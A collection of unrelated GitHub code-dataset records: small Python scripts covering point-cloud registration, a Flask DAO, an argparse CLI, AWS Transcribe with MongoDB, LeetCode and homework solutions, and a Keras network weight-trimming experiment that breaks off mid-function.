interactive_registration(pcd_dict['left'], \n # pcd_dict['torso'], \n # picked_left, picked_torso,\n # trans_dir+'/left2torso.npy')\n\n picked_right = pick_points(pcd_dict['right'])\n picked_torso = pick_points(pcd_dict['torso'])\n interactive_registration(pcd_dict['right'], \n pcd_dict['torso'], \n picked_right, picked_torso,\n trans_dir+'/right2torso.npy')\n\n # verify transformation\n # left2torso_E = transformations[(('left','torso'))]\n left2torso_E = np.load(trans_dir+'/left2torso.npy')\n # right2torso_E = 
transformations[(('right','torso'))]\n right2torso_E = np.load(trans_dir+'/right2torso.npy')\n pcd_dict['left'].transform(left2torso_E)\n pcd_dict['right'].transform(right2torso_E)\n o3d.visualization.draw_geometries([pcd for k, pcd in pcd_dict.items()])\n\n\n # global registration\n # start = time.time()\n # result_fast = execute_global_registration(pcd_left, pcd_right,\n # pcd_left_fpfh, pcd_right_fpfh,\n # voxel_size)\n # print(\"Global registration took %.3f sec.\\n\" % (time.time() - start))\n # print(result_fast)\n # draw_registration_result(pcd_left, pcd_right, result_fast.transformation)\n \n # color icp\n # pcd_left = pcd_dict['realsense_left']\n # pcd_right = pcd_dict['realsense_right']\n\n # results = color_registration(pcd_left, pcd_right, 50, 0.04)\n # draw_registration_result(pcd_left, pcd_right, results.transformation)","repo_name":"ShaoxiongYao/ECE598HRI-FinalProject","sub_path":"open3d_calibration.py","file_name":"open3d_calibration.py","file_ext":"py","file_size_in_byte":11825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73070708106","text":"sum = int(input('Введите сумму'))\n\ntext = str\n\nif sum > 4 and sum < 21:\n text = 'копеек'\n\nelif sum == 0:\n text = 'у вас нет денег =('\n\nelse:\n sum > 21\n dot = sum / 10\n res = round(dot - int(dot), 1) * 10\n\n if res == 1:\n text = 'копейка'\n elif res > 1 and res < 5:\n text = 'копейки'\n elif res > 4 and res <= 9 or res == 0:\n text = 'копеек'\n\nprint(sum, text)","repo_name":"DanaMartynovska/ITEA-python-basics-homework","sub_path":"Home work 1 coins.py","file_name":"Home work 1 coins.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37584302976","text":"from project import db\nfrom project.com.vo.CropTypeVO import CropTypeVO\nfrom project.com.vo.CropVO import CropVO\nfrom project.com.vo.ImageVO import ImageVO\nfrom project.com.vo.LoginVO import LoginVO\n\n\nclass ImageDAO:\n def insertImage(self, ImageVO):\n db.session.add(ImageVO)\n db.session.commit()\n\n def viewImage(self, imageVO):\n imageList = db.session.query(ImageVO, CropVO, CropTypeVO, LoginVO) \\\n .join(CropVO, ImageVO.image_CropId == CropVO.cropId) \\\n .join(CropTypeVO, ImageVO.image_CropTypeId == CropTypeVO.cropTypeId) \\\n .join(LoginVO, ImageVO.imageFrom_LoginId == LoginVO.loginId) \\\n .filter(ImageVO.imageFrom_LoginId == imageVO.imageFrom_LoginId).all()\n return imageList\n\n def deleteImage(self, imageVO):\n imageList = ImageVO.query.get(imageVO.imageID)\n db.session.delete(imageList)\n db.session.commit()\n return imageList\n\n def adminViewImage(self):\n imageList = db.session.query(ImageVO, CropVO, CropTypeVO, LoginVO) \\\n .join(CropVO, ImageVO.image_CropId == CropVO.cropId) \\\n .join(CropTypeVO, ImageVO.image_CropTypeId == CropTypeVO.cropTypeId) \\\n .join(LoginVO, ImageVO.imageFrom_LoginId == LoginVO.loginId).all()\n return imageList\n","repo_name":"soham2512/Agripedia","sub_path":"project/com/dao/ImageDAO.py","file_name":"ImageDAO.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16006758408","text":"from argparse import ArgumentParser\n\n\ndef argparse_setup() -> ArgumentParser.parse_args:\n \"\"\"Setup and return argparse.\"\"\"\n parser = ArgumentParser()\n\n parser.add_argument(\n '-c',\n '--channel',\n dest='channel',\n help='the channel with the user want to see 
programs from',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-t',\n '--time',\n dest='time',\n metavar='hh:mm',\n help='the time the program starts. E.g. \"20:00\". Format is: \"hh:mm\"',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-a',\n '--all',\n help='show all programs for the chosen channel(s)',\n action='store_true'\n )\n\n parser.add_argument(\n '-d',\n '--day',\n help='the relative day the programs is running, default today (0)',\n choices=[-1, 0, 1, 2, 3, 4, 5, 6],\n type=int,\n default=0\n )\n\n parser.add_argument(\n '--category',\n dest='category',\n help='only show the programs with the chosen category(s)',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n parser.add_argument(\n '-n',\n '--now',\n help='only show the program(s) that is currently',\n action='store_true'\n )\n\n parser.add_argument(\n '-v',\n '--verbose',\n help='show categories when using --all and --time',\n action='store_true'\n )\n\n parser.add_argument(\n '--default-channels',\n dest='default_channels',\n help='change default channels to the chosen channel(s)',\n nargs='*'\n )\n\n parser.add_argument(\n '--default-space-seperator',\n dest='default_space_seperator',\n help='change space seperator sign',\n type=str\n )\n\n parser.add_argument(\n '--justify-length',\n dest='justify_length',\n help='change justify length',\n type=str\n )\n\n parser.add_argument(\n '-s',\n '--search',\n dest='search',\n help='search for programs',\n nargs=\"*\",\n action=\"extend\",\n type=str\n )\n\n return parser.parse_args()\n","repo_name":"Crinibus/tvguide","sub_path":"tvguide/argument.py","file_name":"argument.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"11859017908","text":"#!/usr/bin/python3\n\"\"\"method that determines if all the boxes can be opened\"\"\"\n\n\ndef canUnlockAll(boxes):\n \"\"\"Function to unlock all the boxes\"\"\"\n lengthBoxes = len(boxes)\n if not lengthBoxes:\n return False\n unlocked = [0]\n for key in unlocked:\n for box in boxes[key]:\n if box not in unlocked and box < lengthBoxes:\n unlocked.append(box)\n if len(unlocked) == lengthBoxes:\n return True\n return False\n","repo_name":"oscarmrt/holbertonschool-interview","sub_path":"0x00-lockboxes/0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40471778570","text":"import tweepy\n\n#some tests trying to get tweet information using tweepy\n\napikey='***'\napikeysecret='***'\n\naccesstoken='***'\naccesstokensecret='***'\n\nauth = tweepy.OAuthHandler(apikey, apikeysecret)\nauth.set_access_token(accesstoken, accesstokensecret)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\ntarget = \"badiyonbot\"\nprint(\"getting data for \" + target)\nitem = api.get_user(target)\nprint(\"name: \" + item.name)\nprint(\"description: \" + item.description)\nprint(\"screen_name: \" + item.screen_name)\nprint(\"id: \" + str(item.id))\n\ntweets = api.home_timeline(target, trim_user=item.id)\nprint(tweets)\n","repo_name":"Badiyon/Python","sub_path":"TwitterBotProject/get_tweets.py","file_name":"get_tweets.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29821611181","text":"import time\nimport json\nimport uuid\nimport boto3\nimport 
pymongo\nfrom urllib import request\nfrom dotenv import load_dotenv, dotenv_values\n\nload_dotenv()\nconfig = dotenv_values()\n\nclient = boto3.client('transcribe')\n\ncxn = pymongo.MongoClient(config['MONGO_URI'], serverSelectionTimeoutMS=5000)\ntry:\n # verify the connection works by pinging the database\n # The ping command is cheap and does not require auth.\n cxn.admin.command('ping')\n db = cxn[config['MONGO_DBNAME']] # store a reference to the database\n # if we get here, the connection worked!\n print(' *', 'Connected to MongoDB!')\nexcept Exception as e:\n # the ping command failed, so the connection is not available.\n # render_template('error.html', error=e) # render the edit template\n print(' *', \"Failed to connect to MongoDB at\", config['MONGO_URI'])\n print('Database connection error:', e) # debug\n\n\ndef start_transcription_job(s3_file_url: str, language_code: str = \"en-US\", job_name:str = None):\n if not job_name:\n job_name = str(uuid.uuid4())\n\n response = client.start_transcription_job(\n TranscriptionJobName=job_name,\n LanguageCode=language_code,\n Media={\n 'MediaFileUri': s3_file_url\n }\n )\n\n job = {\n \"name\": job_name,\n \"status\": response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"],\n \"language\": response[\"TranscriptionJob\"][\"LanguageCode\"],\n \"media_file_url\": response[\"TranscriptionJob\"][\"Media\"][\"MediaFileUri\"],\n \"creation_time\": response[\"TranscriptionJob\"][\"CreationTime\"]\n }\n\n db.jobs.insert_one(job)\n\n return job_name, response\n\n\ndef get_transcription_job(job_name: str):\n job_status = -1\n\n while job_status not in [\"COMPLETED\", \"FAILED\"]:\n response = client.get_transcription_job(\n TranscriptionJobName=job_name\n )\n\n if response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"] in [\"COMPLETED\", \"FAILED\"]:\n print(f'----- Transcription Job Finished with Status {response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"]} -----')\n\n set_values = {\n \"status\": response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"],\n \"start_time\": response[\"TranscriptionJob\"][\"StartTime\"],\n \"completion_time\": response[\"TranscriptionJob\"][\"CompletionTime\"],\n \"media_format\": response[\"TranscriptionJob\"][\"MediaFormat\"],\n \"media_sample_rate_hertz\": response[\"TranscriptionJob\"][\"MediaSampleRateHertz\"],\n \"transcript_file_uri\": response[\"TranscriptionJob\"][\"Transcript\"][\"TranscriptFileUri\"],\n }\n\n if response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"] == \"COMPLETED\":\n results_response = request.urlopen(response[\"TranscriptionJob\"][\"Transcript\"][\"TranscriptFileUri\"])\n results_str = results_response.read()\n results_dict = json.loads(results_str)\n\n set_values[\"transcript\"] = results_dict[\"results\"][\"transcripts\"][0][\"transcript\"]\n set_values[\"transcript_items\"] = results_dict[\"results\"][\"items\"]\n\n db.jobs.update_one({\n \"name\": job_name\n }, {\n \"$set\": set_values\n })\n\n return response\n else:\n print(\"Current Job Status:\", response[\"TranscriptionJob\"][\"TranscriptionJobStatus\"])\n print(\"Waiting for 5 seconds...\\n\")\n\n time.sleep(5)","repo_name":"software-students-fall2022/containerized-app-exercise-team3","sub_path":"machine-learning-client/utils/aws_transcribe.py","file_name":"aws_transcribe.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"39991912157","text":"from setuptools import setup, find_packages\n\n\nversion = 
'0.1.0'\n\n\nsetup(name=\"helga-flip\",\n version=version,\n description=('Helga plugin to flip words'),\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Topic :: Communications :: Chat :: Internet Relay Chat',\n 'Framework :: Twisted',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n keywords='helga flip',\n author='Shaun Duncan',\n author_email='shaun.duncan@gmail.com',\n url='https://github.com/shaunduncan/helga-flip',\n license='GPLv3',\n packages=find_packages(),\n py_modules=['helga_flip'],\n entry_points = dict(\n helga_plugins=[\n 'flip = helga_flip:flip'\n ],\n ),\n)\n","repo_name":"shaunduncan/helga-flip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7688011420","text":"from protocol import *\n\nclass Host:\n def __init__(self, ip):\n self.ip = ip\n self.total_bytes_received = 0\n self.bytes_sent = 0\n self.hosts = []\n self.protocols = []\n\n def process_host(self, event, length):\n host_list = [x for x in self.hosts if x.ip == event.src]\n if host_list:\n host = host_list[0]\n host.process_protocol(event, length)\n else:\n host = Host(event.src)\n protocol = Protocol(event.t_protocol, length)\n packet = Packet(event.src_port, event.dst_port, length)\n protocol.packets.append(packet)\n host.protocols.append(protocol)\n self.hosts.append(host)\n host.bytes_sent += length\n\n def process_protocol(self, event, length):\n protocol_list = [x for x in self.protocols if x.name == event.t_protocol]\n if protocol_list:\n protocol = protocol_list[0]\n protocol.process_packet(event, length)\n protocol.bytes_sent += length\n else:\n protocol = Protocol(event.t_protocol, length)\n packet = Packet(event.src_port, event.dst_port, length)\n protocol.packets.append(packet)\n self.protocols.append(protocol)\n","repo_name":"jnoziglia/networkAnalyzer","sub_path":"src/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11562335116","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n\n temp=head\n temp2=None\n if head==None:\n return temp2\n else:\n \n while(temp!=None):\n temp2=Node(temp.val)\n temp2.next=temp.next\n temp.next=temp2\n temp=temp.next.next\n temp=head\n while(temp!=None):\n if temp.random:\n temp.next.random=temp.random.next\n temp=temp.next.next\n \n temp=head\n\n temp2=head.next\n temp3=temp2\n while(temp.next.next!=None):\n temp.next=temp.next.next\n temp2.next=temp2.next.next\n temp=temp.next\n temp2=temp2.next\n temp.next=None\n temp2.next=None\n return temp3\n \n \n \n \n 
","repo_name":"tjorgais/Leetcode","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39717136634","text":"from collections import defaultdict\n\n\n# 可以将h 数组替换为堆,减少max 的查询操作,增加了插入和删除时的logn时间,\nclass Solution:\n def getSkyline(self, buildings):\n start, end, endheight, startheight = [], [], defaultdict(list), defaultdict(list)\n ret = []\n\n for ele in buildings:\n start.append(ele[0])\n end.append(ele[1])\n endheight[ele[1]].append(ele[2])\n startheight[ele[0]].append(ele[2])\n end.sort()\n\n def helper(arr, ele):\n while arr and arr[0] == ele:\n arr.pop(0)\n return arr\n\n h, maxval = [], 0\n while start or end:\n if start and start[0] <= end[0]:\n p = start.pop(0)\n start = helper(start, p)\n h.extend(startheight[p])\n if p == end[0]:\n for ele in endheight[end[0]]:\n h.remove(ele)\n p = end.pop(0)\n end = helper(end, p)\n elif (start and start[0] > end[0]) or not start:\n for ele in endheight[end[0]]:\n h.remove(ele)\n p = end.pop(0)\n end = helper(end, p)\n\n if not h:\n ret.append([p, 0])\n elif max(h) != maxval:\n maxval = max(h)\n ret.append([p, maxval])\n\n return ret\n\n\nsol = Solution()\nprint(sol.getSkyline([[2, 9, 10], [3, 7, 15], [5, 12, 12], [15, 20, 10], [19, 24, 8]]))\nprint(sol.getSkyline([[0, 1, 3]]))\nprint(sol.getSkyline([[0, 2, 3], [2, 5, 3]]))\nprint(sol.getSkyline([[3, 7, 8], [3, 8, 7], [3, 9, 6], [3, 10, 5], [3, 11, 4], [3, 12, 3], [3, 13, 2], [3, 14, 1]]))\n","repo_name":"shiyutang/DL-Prep","sub_path":"04_Algorithms/Leetcode/L218. the skyline problem.py","file_name":"L218. the skyline problem.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"81"} +{"seq_id":"22022677018","text":"from robot import Robot\n\nclass Fleet:\n def __init__(self):\n self.fleet_of_robots = []\n\n\n def create_fleet(self):\n robot1 = robots.Robot('Buzz', 250, 100)\n robot2 = robots.Robot('Max', 175, 70)\n robot3 = robots.Robot('Omega', 150, 60)\n self.robot_team.append(robot1, robot2, robot3)\n print(self.robot_team)\n\n","repo_name":"austindflatt/RobotsVsDinosaurs","sub_path":"fleet.py","file_name":"fleet.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23841127947","text":"group = {}\ntotal = 0\ngroup_size = 0\n\nwith open(\"input.txt\", \"r\") as fp:\n for line in fp.readlines():\n line = line.rstrip()\n if (line == \"\"):\n for key, value in group.items():\n if value == group_size:\n total += 1\n group = {}\n group_size = 0\n else:\n group_size += 1\n for c in line:\n if c not in group:\n group[c] = 1\n else:\n group[c] += 1\n\n print(total)\n","repo_name":"samdubusc/adventofcode","sub_path":"2020/06/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30473196343","text":"from homework3 import *\n\n\ndef function_parse():\n \"\"\"\n ~F(x,y,John)\n :return:\n \"\"\"\n\n s=\"G(Albert, z, John)\"\n f=parse(s)[0]\n print(f.func)\n print(f.args)\n print(f.negation)\n\n\ndef function_is_constant():\n s=\"John\"\n t=\"x\"\n print(is_constant(s))\n print(is_constant(t))\n print(is_variable(s))\n print(is_variable(t))\n\n\ndef 
function_unification(e=None):\n f=open(\"unification_tests.txt\", 'r')\n data=f.read().split(\"\\n\\n\")\n if e is None:\n e=len(data)\n for d in data[0:e]:\n x,y = d.split('\\n')\n x = parse(x).predicates[0]\n y = parse(y).predicates[0]\n print(x, y)\n print(unification(x, y, {}))\n\n\ndef bool_to_string(a):\n return list(map(lambda x: str(x).upper(), a))\n\n\ndef full_test(e=None):\n f=open(\"all_inputs.txt\")\n data=f.read().split(\"\\n\\n\")\n f.close()\n if e is None:\n e = len(data)\n count = 1\n for raw_case in data[-1*e:]:\n print(\"testing case {}\".format(count))\n case = raw_case.split(\"\\n\")\n queries = int(case[0])\n ans = list(map(lambda x:x.upper(), case[-1*queries:]))\n inp = case[:-1*queries]\n f=open(\"input.txt\", 'w')\n f.write(\"\\n\".join(inp))\n f.close()\n output = bool_to_string(main())\n if ans == output:\n print(\"success\")\n else:\n print(\"fail\")\n print(raw_case)\n count += 1\n\n\nfull_test()\n","repo_name":"Rohithyeravothula/Logic-Resolution","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35357843603","text":"plik=open('liczby.txt',\"r+\")\ntab=[]\nfor i in plik:\n tab.append(int(i.rstrip()))\ncount=0\nfor i in tab:\n reve = int(str(i)[::-1])\n sum=i+reve\n if sum == int(str(sum)[::-1]):\n count+=1\n\nprint(count)\n\n","repo_name":"Marrcel12/Python_zadania","sub_path":"59 zbior/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17892819628","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import preprocessing as pr\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense,Activation\nfrom keras.optimizers import Adam\n\n###############################################################################\n# Loading the data\n###############################################################################\n\nGlobalDirectory=r\"/home/tavoglc/LocalData/\"\nDataDir=GlobalDirectory + \"PricesData.csv\"\n\n###############################################################################\n# Plot Functions\n###############################################################################\n\ndef PlotStyle(Axes): \n \"\"\"\n General style used in all the plots \n \n Axes -> matplotlib axes object\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.spines['right'].set_visible(False)\n Axes.xaxis.set_tick_params(labelsize=12)\n Axes.yaxis.set_tick_params(labelsize=12)\n\n\ndef ImageStyle(Axes): \n \"\"\"\n General style used in all the images\n \n Axes -> matplotlib axes object\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(False)\n Axes.spines['left'].set_visible(False)\n Axes.spines['right'].set_visible(False)\n Axes.set_xticks([])\n Axes.set_yticks([])\n\ndef MakeNetworkWeightsPanel(NetworkWeights):\n \"\"\"\n Makes a panel with three rows an k columns, each column \n contains a visualization for each layer, an histogram and \n color map for the matrix and a line plot for the biases\n \n NetworkWeights -> list, output of model.get_weights() where model \n is a keras model \n \"\"\"\n nrows=3\n ncolumns=int(len(NetworkWeights)/2)\n\n indexs=[[(j,k) for j in range(nrows)] for k in range(ncolumns)]\n\n 
fig,axes=plt.subplots(nrows,ncolumns,figsize=(14,7))\n\n for k in range(ncolumns):\n \n aIndex,bIndex,cIndex=indexs[k]\n \n mappable=axes[aIndex].imshow(NetworkWeights[2*k])\n plt.colorbar(mappable,ax=axes[aIndex])\n \n axes[bIndex].hist(NetworkWeights[2*k].flatten(),bins=50)\n axes[cIndex].plot(NetworkWeights[2*k+1].flatten(),'bo-')\n \n ImageStyle(axes[aIndex])\n PlotStyle(axes[bIndex])\n PlotStyle(axes[cIndex])\n\n plt.tight_layout()\n\n###############################################################################\n# Pretreatement functions\n###############################################################################\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef Normalization(SeriesData):\n \"\"\"\n Time series normalization\n \n SeriesData -> List,array or data frame with the data\n \"\"\" \n cData=np.reshape(np.array(SeriesData),(-1,1))\n Scaler=pr.StandardScaler()\n FitScaler=Scaler.fit(cData)\n \n return FitScaler.transform(cData)\n\n#Itera a lo largo de la serie de datos \ndef SeriesToData(SeriesData,IntervalSize,Forecast):\n \"\"\"\n Generates a trainig and target datasets\n \n SeriesData -> List,array or data frame with the data\n IntervalSize -> int, Interval used for the sliding window\n Forecast -> int, time steps ahead from the las item in the window \n to be forecasted\n \"\"\" \n nSteps=len(SeriesData)\n AContainer=[]\n BContainer=[]\n \n for k in range(nSteps-IntervalSize-Forecast-1):\n \n AContainer.append(SeriesData[k:k+IntervalSize])\n BContainer.append(SeriesData[k+IntervalSize+Forecast])\n \n return np.array(AContainer),np.array(BContainer)\n\n###############################################################################\n# Neural Network Generation \n###############################################################################\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef NeuralGenerator(Shape,Nodes):\n \"\"\"\n Generates a keras deep neural network\n \n Shape -> int, fragment size from the sliding window \n Nodes -> int, Architecture of the neural network \n \"\"\" \n NeuralNet=Sequential()\n NeuralNet.add(Dense(Shape, input_shape=(Shape,)))\n NeuralNet.add(Activation('linear'))\n \n for val in Nodes:\n \n NeuralNet.add(Dense(val))\n NeuralNet.add(Activation('elu'))\n \n NeuralNet.add(Dense(1, name='Series'))\n NeuralNet.add(Activation('linear')) \n \n return NeuralNet\n\n#Centra los datos a promedio 0 y desviacion estadndar unitaria\ndef NeuralTrain(SeriesXVals,SeriesYVals,NetworkStructure):\n \"\"\"\n Trains a keras neural network \n \n SeriesXVals -> array, Training data \n SeriesYVals -> array, Training target\n NetworkStructure -> list,array Architecture of the neural network \n \"\"\" \n nEpochs=25\n net=NeuralGenerator(len(SeriesXVals[0]),NetworkStructure)\n decayRate=0.0000000001/nEpochs\n \n net.compile(loss='mean_squared_error', optimizer = Adam(lr=0.001,decay=decayRate))\n net.fit(SeriesXVals,SeriesYVals, batch_size=64, epochs=nEpochs, verbose=1,shuffle=True)\n TrainedModel=Model(net.input, net.get_layer('Series').output)\n \n return TrainedModel\n\n###############################################################################\n# Data visualization\n###############################################################################\n 
\nData=np.genfromtxt(DataDir,delimiter=',')\nScaledData=Normalization(Data[1:,1]).reshape(1,-1)[0]\n\nplt.figure(1)\nplt.plot(ScaledData)\nax=plt.gca()\nPlotStyle(ax)\n\nTrainSeries=ScaledData[0:int(0.9*len(ScaledData))]\nTestSeries=ScaledData[int(0.9*len(ScaledData)):len(ScaledData)]\n\nfig,axes=plt.subplots(1,2,figsize=(10,5),sharex=False,sharey=True)\n\naxes[0].plot(TrainSeries)\naxes[0].set_xlabel(\"Time\")\naxes[0].set_ylabel(\"Price\")\naxes[1].plot(TestSeries)\naxes[1].set_xlabel(\"Time\")\naxes[1].set_ylabel(\"Price\")\n\nPlotStyle(axes[0])\nPlotStyle(axes[1])\n\n###############################################################################\n# Training the network \n###############################################################################\n\nFragmentSize=35\nForecast=1\nCurrentArchitecture=[25,12,6,3]\n\nXtrain,Ytrain=SeriesToData(TrainSeries,FragmentSize,Forecast)\nXtest,Ytest=SeriesToData(TestSeries,FragmentSize,Forecast)\n\nSeriesModel=NeuralTrain(Xtrain, Ytrain, CurrentArchitecture)\n\nYpred=SeriesModel.predict(Xtest)\n\nplt.figure(3)\nplt.plot(Ypred)\nplt.plot(Ytest,'r')\nax=plt.gca()\nax.set_xlabel(\"Time\")\nax.set_ylabel(\"Price\")\nPlotStyle(ax)\n\nSeriesModel.compile(loss=\"mse\",optimizer=Adam())\nBasePerformance=SeriesModel.evaluate(Xtest,Ytest)\n\n###############################################################################\n# Visualizing the weights \n###############################################################################\n\nCurrentNetworkWeights=SeriesModel.get_weights()\n\nMakeNetworkWeightsPanel(CurrentNetworkWeights)\n\n###############################################################################\n# Trimming Functions\n###############################################################################\n\ndef GetWeightsRanges(WeightsShapes):\n \"\"\"\n Returns a list with the range of weights on each layer\n \n Percentage -> float, range [0,1] fraction of all the weights\n to be trimmed \n WeightsShapes -> list, list with the shapes of every layer in the network \n \"\"\"\n weightRanges=[0]\n for val in WeightsShapes:\n last=weightRanges[-1]\n if len(val)==2:\n weightRanges.append(last+val[0]*val[1])\n else:\n weightRanges.append(last+val[0])\n \n return weightRanges\n\ndef MakeRandomTrimmIndex(Percentage,TotalWeights):\n \"\"\"\n Returns a randomly generated index where the weights will be trimmed \n \n Percentage -> float, range [0,1] fraction of all the weights\n to be trimmed \n TotalWeights -> float, total number of weights\n \"\"\"\n nTrimmed=int(Percentage*TotalWeights)\n index=np.arange(TotalWeights)\n trimmIndex=np.random.choice(index,nTrimmed)\n trimmIndex=np.sort(trimmIndex)\n \n return trimmIndex\n\ndef BoundaryToElement(Value,Boundaries):\n \"\"\"\n Returns the index where a value is between the k and k+1 boundary\n Value -> int, value to be search\n Boundaries -> list, contains the boundaries of each element \n \"\"\"\n responce=-1\n for k in range(len(Boundaries)-1):\n \n if Value>=Boundaries[k] and Value List, contains the location of the weights to be trimmed \n Ranges ->List, boundaries of each element in the weights list\n \"\"\"\n nRanges=len(Ranges)\n nElements=nRanges-1\n indexPerElement=[[] for k in range(nElements)]\n \n for val in Index:\n iElement=BoundaryToElement(val,Ranges)\n indexPerElement[iElement].append(val)\n \n return indexPerElement\n\ndef TrimmByIndex(Index,NetworkWeights):\n \"\"\"\n Creates a new weights list with the trimmed weights\n Index -> list, Locations of the weights to be trimmed \n NetworkWeights 
->List, output from kerasmodel.get_weights()\n \"\"\"\n weightsShapes=[val.shape for val in NetworkWeights]\n ranges=GetWeightsRanges(weightsShapes)\n indexPerElement=OrderIndexs(Index,ranges)\n newWeights=[]\n \n for k in range(len(NetworkWeights)):\n \n if len(indexPerElement[k])==0:\n localArray=NetworkWeights[k].copy()\n newWeights.append(localArray)\n \n else:\n localArray=NetworkWeights[k].copy()\n localArray=localArray.flatten()\n for val in indexPerElement[k]:\n localArray[val-ranges[k]]=0\n localArray=np.reshape(localArray,weightsShapes[k])\n newWeights.append(localArray)\n \n return newWeights\n\ndef RandomTrimming(Percentage,NetworkWeights):\n \"\"\"\n Creates a new weights list with randomly trimmed weights\n Percentage -> float, relative amount of the weights to be trimmed \n NetworkWeights ->List, output from kerasmodel.get_weights()\n \"\"\"\n weightsShapes=[val.shape for val in NetworkWeights]\n ranges=GetWeightsRanges(weightsShapes)\n index=MakeRandomTrimmIndex(Percentage,ranges[-1])\n \n return TrimmByIndex(index,NetworkWeights)\n\ndef GetTrimmPerformance(NetworkWeights,X,Y):\n \"\"\"\n Wrapper function to calculate the performace of the trimming \n operation \n \n NetworkWeights -> list, list of numpy arrays with the network weights\n X -> array, test data\n Y -> array, test data\n \"\"\"\n localNetwork=NeuralGenerator(FragmentSize,CurrentArchitecture)\n localNetwork.set_weights(NetworkWeights)\n localNetwork.compile(loss=\"mse\",optimizer=Adam())\n \n return localNetwork.evaluate(X,Y)\n\n###############################################################################\n# Trimming Performance \n###############################################################################\n\npercentages=np.logspace(0.0001,0.05,50)\npercentages=np.array([np.log10(val) for val in percentages])\n\nperformances=[]\n\nfor val in percentages:\n newWeights=RandomTrimming(val,CurrentNetworkWeights)\n performances.append(1-(GetTrimmPerformance(newWeights,Xtest,Ytest)/BasePerformance))\n\nplt.figure(5)\nplt.plot(100*np.array(percentages),performances,'bo-')\nax=plt.gca()\nax.set_xlabel(\"Trimm %\")\nax.set_ylabel(\"Performance\")\nPlotStyle(ax)\n\n###############################################################################\n# Simulated annealing trimming \n###############################################################################\n\nranges=GetWeightsRanges([val.shape for val in CurrentNetworkWeights])\nTotalWeights=ranges[-1]\n\ndef ObjetiveFunction(Index):\n \"\"\"\n Wrapper function for the objetive function\n Index -> List with the weight locations to be trimmed.\n \"\"\"\n newWeights=TrimmByIndex(Index,CurrentNetworkWeights) \n return GetTrimmPerformance(newWeights,Xtest,Ytest)\n\ndef AcceptanceProbability(Cost,NewCost,Temperature):\n \"\"\"\n Probability to accept a proposed state\n Cost -> float, cost of the previous state \n NewCost -> float, cost of the current state \n Temperature -> float, current temperature in the optimizer\n \"\"\"\n if NewCost List with the weight locations to be trimmed.\n \"\"\"\n for k in range(len(Index)):\n if Index[k]>=TotalWeights:\n Index[k]=int(np.random.choice(np.arange(0,TotalWeights-1),1))\n return Index\n\ndef RandomNeighbour(State,Fraction):\n \"\"\"\n Makes a small change to randomly selected items in the State \n State -> List with the weight locations to be trimmed.\n Fraction -> float, optimizer temperature\n \"\"\"\n nToModify=int(len(State)/4)\n 